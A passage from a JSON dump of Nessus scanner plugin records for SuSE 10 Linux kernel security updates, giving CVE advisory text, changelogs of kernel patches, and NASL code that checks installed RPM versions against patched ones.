off/on\n\n - Problem-ID: 38491 - zfcp: Error messages when LUN 0 is\n present\n\n - Problem-ID: 37390 - zcrypt: fix PCIXCC/CEX2C error\n recovery [#306056]\n\n - Problem-ID: 38500 - kernel: too few page cache pages in\n state volatile\n\n - Problem-ID: 38634 - qeth: crash during reboot after\n failing online setting\n\n - Problem-ID: 38927 - kernel: shared memory may not be\n volatile\n\n - Problem-ID: 39069 - cio: Disable channel path\n measurements on shutdown/reboot\n\n - Problem-ID: 27787 - qeth: recognize 'exclusively\n used'-RC from Hydra3\n\n - Problem-ID: 38330 - qeth: make qeth driver loadable\n without ipv6 module\n\n For further description of the named Problem-IDs, please\n look to\n http://www-128.ibm.com/developerworks/linux/linux390/oct\n ober 2005_recommended.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2007-4571.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2007-4573.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 4471.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(264);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/10/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/12/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:1, cpu:\"i586\", reference:\"kernel-bigsmp-2.6.16.53-0.16\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:1, cpu:\"i586\", reference:\"kernel-default-2.6.16.53-0.16\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:1, cpu:\"i586\", reference:\"kernel-smp-2.6.16.53-0.16\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:1, cpu:\"i586\", reference:\"kernel-source-2.6.16.53-0.16\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:1, cpu:\"i586\", reference:\"kernel-syms-2.6.16.53-0.16\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:1, cpu:\"i586\", reference:\"kernel-xen-2.6.16.53-0.16\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:1, cpu:\"i586\", reference:\"kernel-xenpae-2.6.16.53-0.16\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:1, cpu:\"i586\", reference:\"kernel-bigsmp-2.6.16.53-0.16\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:1, cpu:\"i586\", reference:\"kernel-debug-2.6.16.53-0.16\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:1, cpu:\"i586\", reference:\"kernel-default-2.6.16.53-0.16\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:1, cpu:\"i586\", reference:\"kernel-kdump-2.6.16.53-0.16\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:1, cpu:\"i586\", reference:\"kernel-smp-2.6.16.53-0.16\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:1, cpu:\"i586\", reference:\"kernel-source-2.6.16.53-0.16\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:1, cpu:\"i586\", reference:\"kernel-syms-2.6.16.53-0.16\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:1, cpu:\"i586\", reference:\"kernel-xen-2.6.16.53-0.16\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:1, cpu:\"i586\", reference:\"kernel-xenpae-2.6.16.53-0.16\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:45:26", "description": "This kernel update fixes the following security problems :\n\n - The IPv6 protocol allows remote attackers to cause a\n denial of service via crafted IPv6 type 0 route headers\n (IPV6_RTHDR_TYPE_0) that create network amplification\n between two routers. (CVE-2007-2242)\n\n The default is that RH0 is disabled now. To adjust this,\n write to the file /proc/net/accept_source_route6.\n\n - The random number feature in the Linux kernel 2.6 (1)\n did not properly seed pools when there is no entropy, or\n (2) used an incorrect cast when extracting entropy,\n which might have caused the random number generator to\n provide the same values after reboots on systems without\n an entropy source. (CVE-2007-2453)\n\n - A NULL pointer dereference in SCTP connection tracking\n could be caused by a remote attacker by sending\n specially crafted packets. Note that this requires SCTP\n set-up and active to be exploitable. (CVE-2007-2876)\n\n - Stack-based buffer overflow in the random number\n generator (RNG) implementation in the Linux kernel\n before 2.6.22 might allow local root users to cause a\n denial of service or gain privileges by setting the\n default wakeup threshold to a value greater than the\n output pool size, which triggers writing random numbers\n to the stack by the pool transfer function involving\n 'bound check ordering'. (CVE-2007-3105)\n\n Since this value can only be changed by a root user,\n exploitability is low.\n\n - The signal handling in the Linux kernel, when run on\n PowerPC systems using HTX, allows local users to cause a\n denial of service via unspecified vectors involving\n floating point corruption and concurrency.\n (CVE-2007-3107)\n\n - Memory leak in the PPP over Ethernet (PPPoE) socket\n implementation in the Linux kernel allowed local users\n to cause a denial of service (memory consumption) by\n creating a socket using connect, and releasing it before\n the PPPIOCGCHAN ioctl is initialized. (CVE-2007-2525)\n\n - The lcd_write function in drivers/usb/misc/usblcd.c in\n the Linux kernel did not limit the amount of memory used\n by a caller, which allowed local users to cause a denial\n of service (memory consumption). (CVE-2007-3513)\n\n - A local attacker could send a death signal to a setuid\n root program under certain conditions, potentially\n causing unwanted behaviour in this program.\n (CVE-2007-3848)\n\n - On machines with a Intel i965 based graphics card local\n users with access to the direct rendering devicenode\n could overwrite memory on the machine and so gain root\n privileges. (CVE-2007-3851)\n\n - Fixed a denial of service possibility where a local\n attacker with access to a pwc camera device could hang\n the USB subsystem. [#302194]\n\nand the following non security bugs :\n\n - patches.arch/ppc-oprofile-970mp.patch: enable ppc64/970\n MP, requires oprofile 0.9.3 [#252696]\n\n - patches.arch/x86_64-no-tsc-with-C3: don't use TSC on\n x86_64 Intel systems when CPU has C3 [#254061]\n\n - patches.arch/x86_64-hpet-lost-interrupts-fix.patch:\n backport x86_64 hpet lost interrupts code [#257035]\n\n - patches.fixes/fusion-nat-consumption-fix: handle a\n potential race in mptbase. This fixes a NaT consumption\n crash [#257412]\n\n - patches.arch/ia64-skip-clock-calibration: enabled\n [#259501]\n\n - patches.fixes/md-raid1-handle-read-error: Correctly\n handle read errors from a failed drive in raid1\n [#261459]\n\n - patches.arch/ia64-fix-kdump-on-init: kdump on INIT needs\n multi-nodes sync-up (v.2) [#265764]\n\n - patches.arch/ia64-perfmon-fix-2: race condition between\n pfm_context_create and pfm_read [#268131]\n\n - patches.fixes/cpufreq_ppc_boot_option.patch: workaround\n for _PPC (BIOS cpufreq limitations) [#269579]\n\n - patches.arch/acpi_package_object_support.patch: ACPI\n package object as method parameter support (in AML)\n [#270956]\n\n - patches.fixes/ia64_cpufreq_PDC.patch: correctly assign\n as cpufreq capable driver (_PDC) to BIOS [#270973]\n\n - patches.arch/ia64-kdump-hpzx1-ioc-workaround: update to\n latest upstream version of the patch [#271158]\n\n - patches.suse/delayacct_memleak.patch: Fix delayacct\n memory leak [#271187]\n\n - patches.fixes/fc_transport-check-portstate-before-scan:\n check FC portstates before invoking target scan\n [#271338]\n\n - patches.fixes/unusual14cd.patch: quirk for 14cd:6600\n [#274087]\n\n -\n patches.fixes/reiserfs-change_generation_on_update_sd.di\n ff: fix assertion failure in reiserfs [#274288]\n\n -\n patches.drivers/d-link-dge-530t-should-use-the-skge-driv\n er.patch: D-Link DGE-530T should use the skge driver\n [#275376]\n\n - patches.arch/ia64-dont-unwind-running-tasks.patch: Only\n unwind non-running tasks [#275854]\n\n - patches.fixes/dm-mpath-rdac-avt-support: short circuit\n RDAC hardware handler in AVT mode [#277834]\n\n - patches.fixes/lkcd-re-enable-valid_phys_addr_range:\n re-enable the valid_phys_addr_range() check [#279433]\n\n - patches.drivers/cciss-panic-on-reboot: when root\n filesystem is xfs the server cannot do a second reboot\n [#279436] Also resolves same issue in [#291759].\n\n - patches.drivers/ide-hpt366-fix-302n-oops: fix hpt302n\n oops [#279705]\n\n - patches.fixes/serial-8250-backup-timer-2-deadlock-fix:\n fix possible deadlock [#280771]\n\n - patches.fixes/nfs-osync-error-return: ensure proper\n error return from O_SYNC writes [#280833]\n\n - patches.fixes/acpi_pci_hotplug_poweroff.patch: ACPI PCI\n hotplug driver acpiphp unable to power off PCI slot\n [#281234]\n\n -\n patches.drivers/pci-hotplug-acpiphp-remove-hot-plug-para\n meter-write-to-pci-host-bridge.patch: remove hot plug\n parameter write to PCI host bridge [#281239]\n\n - patches.fixes/scsi-set-correct-resid: Incorrect 'resid'\n field values when using a tape device [#281640]\n\n - patches.drivers/usb-edgeport-epic-support.patch: USB:\n add EPIC support to the io_edgeport driver [#281921]\n\n - patches.fixes/usb-hid-ncr-no-init-reports.patch: HID:\n Don't initialize reports for NCR devices [#281921]\n\n - patches.drivers/ppc-power6-ehea.patch: use decimal\n values in sysfs propery logical_port_id, fix panic when\n adding / removing logical eHEA ports [#283070]\n\n - patches.arch/ppc-power6-ebus.patch: DLPAR Adapter\n add/remove functionality for eHEA [#283239]\n\n - patches.fixes/nfs-enospc: Return ENOSPC and EDQUOT to\n NFS write requests more promptly [#284042]\n\n -\n patches.drivers/pci-hotplug-acpiphp-avoid-acpiphp-cannot\n -get-bridge-info-pci-hotplug-failure.patch: PCI:\n hotplug: acpiphp: avoid acpiphp 'cannot get bridge info'\n PCI hotplug failure [#286193]\n\n - patches.drivers/lpfc-8.1.10.9-update: lpfc update to\n 8.1.10.9 [#286223]\n\n - patches.fixes/make-swappiness-safer-to-use.patch: Handle\n low swappiness gracefully [#288799]\n\n - patches.arch/ppc-oprofile-power5plusplus.patch: oprofile\n support for Power 5++ [#289223]\n\n - patches.drivers/ppc-power6-ehea.patch: Fixed possible\n kernel panic on VLAN packet recv [#289301]\n\n - patches.fixes/igrab_should_check_for_i_clear.patch:\n igrab() should check for I_CLEAR [#289576]\n\n - patches.fixes/wait_for_sysfs_population.diff: Driver\n core: bus device event delay [#289964]\n\n -\n patches.drivers/scsi-throttle-SG_DXFER_TO_FROM_DEV-warni\n ng-better: better throttling of SG_DXFER_TO_FROM_DEV\n warning messages [#290117]\n\n -\n patches.arch/mark-unwind-info-for-signal-trampolines-in-\n vdsos.patch: Mark unwind info for signal trampolines in\n vDSOs [#291421]\n\n - patches.fixes/hugetlbfs-stack-grows-fix.patch: don't\n allow the stack to grow into hugetlb reserved regions\n [#294021]\n\n - patches.drivers/alsa-post-sp1-hda-analog-update: add\n support of of missing AD codecs [#294471]\n\n - patches.drivers/alsa-post-sp1-hda-conexant-fixes: fix\n unterminated arrays [#294480]\n\n - patches.fixes/fix_hpet_init_race.patch: fix a race in\n HPET initialization on x86_64 resulting in a lockup on\n boot [#295115]\n\n - patches.drivers/alsa-post-sp1-hda-sigmatel-pin-fix: Fix\n number of pin widgets with STAC codecs [#295653]\n\n -\n patches.fixes/pci-pcieport-driver-remove-invalid-warning\n -message.patch: PCI: pcieport-driver: remove invalid\n warning message [#297135] [#298561]\n\n - patches.kernel.org/patch-2.6.16.NN-$((NN+1)), NN =\n 18,...,52: update to Kernel 2.6.16.53; lots of bugfixes\n [#298719] [#186582] [#186583] [#186584]\n\n - patches.fixes/ocfs2-1.2-svn-r3027.diff: proactive patch\n [#298845]\n\n - patches.drivers/b44-phy-fix: Fix frequent PHY resets\n under load on b44 [#301653]\n\n - dd patches.arch/ppc-eeh-node-status-okay.patch firmware\n returns 'okay' instead of 'ok' for node status [#301788]", "edition": 25, "published": "2012-05-17T00:00:00", "title": "SuSE 10 Security Update : Linux kernel (ZYPP Patch Number 4186)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-2876", "CVE-2007-3848", "CVE-2007-3107", "CVE-2007-3851", "CVE-2007-3105", "CVE-2007-3513", "CVE-2007-2242", "CVE-2007-2453", "CVE-2007-2525"], "modified": "2012-05-17T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_KERNEL-4186.NASL", "href": "https://www.tenable.com/plugins/nessus/59123", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(59123);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2007-2242\", \"CVE-2007-2453\", \"CVE-2007-2525\", \"CVE-2007-2876\", \"CVE-2007-3105\", \"CVE-2007-3107\", \"CVE-2007-3513\", \"CVE-2007-3848\", \"CVE-2007-3851\");\n\n script_name(english:\"SuSE 10 Security Update : Linux kernel (ZYPP Patch Number 4186)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This kernel update fixes the following security problems :\n\n - The IPv6 protocol allows remote attackers to cause a\n denial of service via crafted IPv6 type 0 route headers\n (IPV6_RTHDR_TYPE_0) that create network amplification\n between two routers. (CVE-2007-2242)\n\n The default is that RH0 is disabled now. To adjust this,\n write to the file /proc/net/accept_source_route6.\n\n - The random number feature in the Linux kernel 2.6 (1)\n did not properly seed pools when there is no entropy, or\n (2) used an incorrect cast when extracting entropy,\n which might have caused the random number generator to\n provide the same values after reboots on systems without\n an entropy source. (CVE-2007-2453)\n\n - A NULL pointer dereference in SCTP connection tracking\n could be caused by a remote attacker by sending\n specially crafted packets. Note that this requires SCTP\n set-up and active to be exploitable. (CVE-2007-2876)\n\n - Stack-based buffer overflow in the random number\n generator (RNG) implementation in the Linux kernel\n before 2.6.22 might allow local root users to cause a\n denial of service or gain privileges by setting the\n default wakeup threshold to a value greater than the\n output pool size, which triggers writing random numbers\n to the stack by the pool transfer function involving\n 'bound check ordering'. (CVE-2007-3105)\n\n Since this value can only be changed by a root user,\n exploitability is low.\n\n - The signal handling in the Linux kernel, when run on\n PowerPC systems using HTX, allows local users to cause a\n denial of service via unspecified vectors involving\n floating point corruption and concurrency.\n (CVE-2007-3107)\n\n - Memory leak in the PPP over Ethernet (PPPoE) socket\n implementation in the Linux kernel allowed local users\n to cause a denial of service (memory consumption) by\n creating a socket using connect, and releasing it before\n the PPPIOCGCHAN ioctl is initialized. (CVE-2007-2525)\n\n - The lcd_write function in drivers/usb/misc/usblcd.c in\n the Linux kernel did not limit the amount of memory used\n by a caller, which allowed local users to cause a denial\n of service (memory consumption). (CVE-2007-3513)\n\n - A local attacker could send a death signal to a setuid\n root program under certain conditions, potentially\n causing unwanted behaviour in this program.\n (CVE-2007-3848)\n\n - On machines with a Intel i965 based graphics card local\n users with access to the direct rendering devicenode\n could overwrite memory on the machine and so gain root\n privileges. (CVE-2007-3851)\n\n - Fixed a denial of service possibility where a local\n attacker with access to a pwc camera device could hang\n the USB subsystem. [#302194]\n\nand the following non security bugs :\n\n - patches.arch/ppc-oprofile-970mp.patch: enable ppc64/970\n MP, requires oprofile 0.9.3 [#252696]\n\n - patches.arch/x86_64-no-tsc-with-C3: don't use TSC on\n x86_64 Intel systems when CPU has C3 [#254061]\n\n - patches.arch/x86_64-hpet-lost-interrupts-fix.patch:\n backport x86_64 hpet lost interrupts code [#257035]\n\n - patches.fixes/fusion-nat-consumption-fix: handle a\n potential race in mptbase. This fixes a NaT consumption\n crash [#257412]\n\n - patches.arch/ia64-skip-clock-calibration: enabled\n [#259501]\n\n - patches.fixes/md-raid1-handle-read-error: Correctly\n handle read errors from a failed drive in raid1\n [#261459]\n\n - patches.arch/ia64-fix-kdump-on-init: kdump on INIT needs\n multi-nodes sync-up (v.2) [#265764]\n\n - patches.arch/ia64-perfmon-fix-2: race condition between\n pfm_context_create and pfm_read [#268131]\n\n - patches.fixes/cpufreq_ppc_boot_option.patch: workaround\n for _PPC (BIOS cpufreq limitations) [#269579]\n\n - patches.arch/acpi_package_object_support.patch: ACPI\n package object as method parameter support (in AML)\n [#270956]\n\n - patches.fixes/ia64_cpufreq_PDC.patch: correctly assign\n as cpufreq capable driver (_PDC) to BIOS [#270973]\n\n - patches.arch/ia64-kdump-hpzx1-ioc-workaround: update to\n latest upstream version of the patch [#271158]\n\n - patches.suse/delayacct_memleak.patch: Fix delayacct\n memory leak [#271187]\n\n - patches.fixes/fc_transport-check-portstate-before-scan:\n check FC portstates before invoking target scan\n [#271338]\n\n - patches.fixes/unusual14cd.patch: quirk for 14cd:6600\n [#274087]\n\n -\n patches.fixes/reiserfs-change_generation_on_update_sd.di\n ff: fix assertion failure in reiserfs [#274288]\n\n -\n patches.drivers/d-link-dge-530t-should-use-the-skge-driv\n er.patch: D-Link DGE-530T should use the skge driver\n [#275376]\n\n - patches.arch/ia64-dont-unwind-running-tasks.patch: Only\n unwind non-running tasks [#275854]\n\n - patches.fixes/dm-mpath-rdac-avt-support: short circuit\n RDAC hardware handler in AVT mode [#277834]\n\n - patches.fixes/lkcd-re-enable-valid_phys_addr_range:\n re-enable the valid_phys_addr_range() check [#279433]\n\n - patches.drivers/cciss-panic-on-reboot: when root\n filesystem is xfs the server cannot do a second reboot\n [#279436] Also resolves same issue in [#291759].\n\n - patches.drivers/ide-hpt366-fix-302n-oops: fix hpt302n\n oops [#279705]\n\n - patches.fixes/serial-8250-backup-timer-2-deadlock-fix:\n fix possible deadlock [#280771]\n\n - patches.fixes/nfs-osync-error-return: ensure proper\n error return from O_SYNC writes [#280833]\n\n - patches.fixes/acpi_pci_hotplug_poweroff.patch: ACPI PCI\n hotplug driver acpiphp unable to power off PCI slot\n [#281234]\n\n -\n patches.drivers/pci-hotplug-acpiphp-remove-hot-plug-para\n meter-write-to-pci-host-bridge.patch: remove hot plug\n parameter write to PCI host bridge [#281239]\n\n - patches.fixes/scsi-set-correct-resid: Incorrect 'resid'\n field values when using a tape device [#281640]\n\n - patches.drivers/usb-edgeport-epic-support.patch: USB:\n add EPIC support to the io_edgeport driver [#281921]\n\n - patches.fixes/usb-hid-ncr-no-init-reports.patch: HID:\n Don't initialize reports for NCR devices [#281921]\n\n - patches.drivers/ppc-power6-ehea.patch: use decimal\n values in sysfs propery logical_port_id, fix panic when\n adding / removing logical eHEA ports [#283070]\n\n - patches.arch/ppc-power6-ebus.patch: DLPAR Adapter\n add/remove functionality for eHEA [#283239]\n\n - patches.fixes/nfs-enospc: Return ENOSPC and EDQUOT to\n NFS write requests more promptly [#284042]\n\n -\n patches.drivers/pci-hotplug-acpiphp-avoid-acpiphp-cannot\n -get-bridge-info-pci-hotplug-failure.patch: PCI:\n hotplug: acpiphp: avoid acpiphp 'cannot get bridge info'\n PCI hotplug failure [#286193]\n\n - patches.drivers/lpfc-8.1.10.9-update: lpfc update to\n 8.1.10.9 [#286223]\n\n - patches.fixes/make-swappiness-safer-to-use.patch: Handle\n low swappiness gracefully [#288799]\n\n - patches.arch/ppc-oprofile-power5plusplus.patch: oprofile\n support for Power 5++ [#289223]\n\n - patches.drivers/ppc-power6-ehea.patch: Fixed possible\n kernel panic on VLAN packet recv [#289301]\n\n - patches.fixes/igrab_should_check_for_i_clear.patch:\n igrab() should check for I_CLEAR [#289576]\n\n - patches.fixes/wait_for_sysfs_population.diff: Driver\n core: bus device event delay [#289964]\n\n -\n patches.drivers/scsi-throttle-SG_DXFER_TO_FROM_DEV-warni\n ng-better: better throttling of SG_DXFER_TO_FROM_DEV\n warning messages [#290117]\n\n -\n patches.arch/mark-unwind-info-for-signal-trampolines-in-\n vdsos.patch: Mark unwind info for signal trampolines in\n vDSOs [#291421]\n\n - patches.fixes/hugetlbfs-stack-grows-fix.patch: don't\n allow the stack to grow into hugetlb reserved regions\n [#294021]\n\n - patches.drivers/alsa-post-sp1-hda-analog-update: add\n support of of missing AD codecs [#294471]\n\n - patches.drivers/alsa-post-sp1-hda-conexant-fixes: fix\n unterminated arrays [#294480]\n\n - patches.fixes/fix_hpet_init_race.patch: fix a race in\n HPET initialization on x86_64 resulting in a lockup on\n boot [#295115]\n\n - patches.drivers/alsa-post-sp1-hda-sigmatel-pin-fix: Fix\n number of pin widgets with STAC codecs [#295653]\n\n -\n patches.fixes/pci-pcieport-driver-remove-invalid-warning\n -message.patch: PCI: pcieport-driver: remove invalid\n warning message [#297135] [#298561]\n\n - patches.kernel.org/patch-2.6.16.NN-$((NN+1)), NN =\n 18,...,52: update to Kernel 2.6.16.53; lots of bugfixes\n [#298719] [#186582] [#186583] [#186584]\n\n - patches.fixes/ocfs2-1.2-svn-r3027.diff: proactive patch\n [#298845]\n\n - patches.drivers/b44-phy-fix: Fix frequent PHY resets\n under load on b44 [#301653]\n\n - dd patches.arch/ppc-eeh-node-status-okay.patch firmware\n returns 'okay' instead of 'ok' for node status [#301788]\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2007-2242.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2007-2453.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2007-2525.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2007-2876.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2007-3105.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2007-3107.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2007-3513.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2007-3848.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2007-3851.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 4186.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_cwe_id(119, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/08/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/05/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:1, cpu:\"x86_64\", reference:\"kernel-default-2.6.16.53-0.8\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:1, cpu:\"x86_64\", reference:\"kernel-smp-2.6.16.53-0.8\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:1, cpu:\"x86_64\", reference:\"kernel-source-2.6.16.53-0.8\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:1, cpu:\"x86_64\", reference:\"kernel-syms-2.6.16.53-0.8\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:1, cpu:\"x86_64\", reference:\"kernel-xen-2.6.16.53-0.8\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:1, cpu:\"x86_64\", reference:\"kernel-debug-2.6.16.53-0.8\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:1, cpu:\"x86_64\", reference:\"kernel-default-2.6.16.53-0.8\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:1, cpu:\"x86_64\", reference:\"kernel-kdump-2.6.16.53-0.8\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:1, cpu:\"x86_64\", reference:\"kernel-smp-2.6.16.53-0.8\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:1, cpu:\"x86_64\", reference:\"kernel-source-2.6.16.53-0.8\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:1, cpu:\"x86_64\", reference:\"kernel-syms-2.6.16.53-0.8\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:1, cpu:\"x86_64\", reference:\"kernel-xen-2.6.16.53-0.8\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-17T14:45:25", "description": "This kernel update fixes the following security problems :\n\n - The IPv6 protocol allows remote attackers to cause a\n denial of service via crafted IPv6 type 0 route headers\n (IPV6_RTHDR_TYPE_0) that create network amplification\n between two routers. (CVE-2007-2242)\n\n The default is that RH0 is disabled now. To adjust this,\n write to the file /proc/net/accept_source_route6.\n\n - The random number feature in the Linux kernel 2.6 (1)\n did not properly seed pools when there is no entropy, or\n (2) used an incorrect cast when extracting entropy,\n which might have caused the random number generator to\n provide the same values after reboots on systems without\n an entropy source. (CVE-2007-2453)\n\n - A NULL pointer dereference in SCTP connection tracking\n could be caused by a remote attacker by sending\n specially crafted packets. Note that this requires SCTP\n set-up and active to be exploitable. (CVE-2007-2876)\n\n - Stack-based buffer overflow in the random number\n generator (RNG) implementation in the Linux kernel\n before 2.6.22 might allow local root users to cause a\n denial of service or gain privileges by setting the\n default wakeup threshold to a value greater than the\n output pool size, which triggers writing random numbers\n to the stack by the pool transfer function involving\n 'bound check ordering'. (CVE-2007-3105)\n\n Since this value can only be changed by a root user,\n exploitability is low.\n\n - The signal handling in the Linux kernel, when run on\n PowerPC systems using HTX, allows local users to cause a\n denial of service via unspecified vectors involving\n floating point corruption and concurrency.\n (CVE-2007-3107)\n\n - Memory leak in the PPP over Ethernet (PPPoE) socket\n implementation in the Linux kernel allowed local users\n to cause a denial of service (memory consumption) by\n creating a socket using connect, and releasing it before\n the PPPIOCGCHAN ioctl is initialized. (CVE-2007-2525)\n\n - The lcd_write function in drivers/usb/misc/usblcd.c in\n the Linux kernel did not limit the amount of memory used\n by a caller, which allowed local users to cause a denial\n of service (memory consumption). (CVE-2007-3513)\n\n - A local attacker could send a death signal to a setuid\n root program under certain conditions, potentially\n causing unwanted behaviour in this program.\n (CVE-2007-3848)\n\n - On machines with a Intel i965 based graphics card local\n users with access to the direct rendering devicenode\n could overwrite memory on the machine and so gain root\n privileges. (CVE-2007-3851)\n\n - Fixed a denial of service possibility where a local\n attacker with access to a pwc camera device could hang\n the USB subsystem. [#302194]\n\nand the following non security bugs :\n\n - patches.arch/ppc-oprofile-970mp.patch: enable ppc64/970\n MP, requires oprofile 0.9.3 [#252696]\n\n - patches.arch/x86_64-no-tsc-with-C3: don't use TSC on\n x86_64 Intel systems when CPU has C3 [#254061]\n\n - patches.arch/x86_64-hpet-lost-interrupts-fix.patch:\n backport x86_64 hpet lost interrupts code [#257035]\n\n - patches.fixes/fusion-nat-consumption-fix: handle a\n potential race in mptbase. This fixes a NaT consumption\n crash [#257412]\n\n - patches.arch/ia64-skip-clock-calibration: enabled\n [#259501]\n\n - patches.fixes/md-raid1-handle-read-error: Correctly\n handle read errors from a failed drive in raid1\n [#261459]\n\n - patches.arch/ia64-fix-kdump-on-init: kdump on INIT needs\n multi-nodes sync-up (v.2) [#265764]\n\n - patches.arch/ia64-perfmon-fix-2: race condition between\n pfm_context_create and pfm_read [#268131]\n\n - patches.fixes/cpufreq_ppc_boot_option.patch: workaround\n for _PPC (BIOS cpufreq limitations) [#269579]\n\n - 